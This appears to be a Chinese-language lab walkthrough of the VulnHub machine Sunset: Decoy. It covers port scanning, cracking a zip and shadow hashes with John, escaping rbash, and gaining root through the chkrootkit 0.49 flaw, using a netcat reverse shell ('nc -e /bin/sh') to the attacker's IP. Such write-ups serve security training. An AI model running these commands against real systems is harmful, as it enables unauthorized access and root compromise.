PJzhang:vulnhub靶机sunset系列SUNSET:DECOY

猫宁~~~

 

地址：https://www.vulnhub.com/entry/sunset-decoy,505/

关注工具和思路。

nmap 192.168.43.0/24
靶机IP
192.168.43.32
攻击机
192.168.43.154

nmap -A -p1-65535 192.168.43.32

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38

访问http://192.168.43.32/，发现目录暴露文件save.zip，解压需要密码

dirb http://192.168.43.32/

zip2john save.zip > pojie.hash
cat pojie.hash

john --wordlist=/usr/share/wordlists/rockyou.txt pojie.hash
结果manuel (save.zip)

unzip save.zip
输入密码manuel
显示文件夹etc，内有文件group hostname hosts passwd shadow sudoers

进入/root/Desktop/etc
cat shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
获知
server (296640a3b825115a47b68fc44501c828)

296640a3b825115a47b68fc44501c828是用户名

ssh 296640a3b825115a47b68fc44501c828@192.168.43.32
密码server

提示-rbash: dircolors: command not found

ssh 296640a3b825115a47b68fc44501c828@192.168.43.32 -t "bash --noprofile"

echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
修改环境变量
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

cat user.txt
35253d886842075b2c6390f35946e41f

./honeypot.decoy，执行二进制文件

cd /home/296640a3b825115a47b68fc44501c828/SV-502/logs
cat log.txt
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz

searchsploit chkrootkit
Chkrootkit 0.49 - Local Privilege Escalation linux/local/33899.txt
https://www.exploit-db.com/exploits/33899

echo "/usr/bin/nc -e /bin/sh 192.168.43.154 4444" > /tmp/update
chmod +777 /tmp/update
进入 /home/296640a3b825115a47b68fc44501c828/
./honeypot.decoy
选择
5 Launch an AV Scan.

攻击机nc -lvnp 4444

connect to [192.168.43.154] from (UNKNOWN) [192.168.43.32] 4444

获取权限

id
uid=0(root) gid=0(root) groups=0(root)

cat root.txt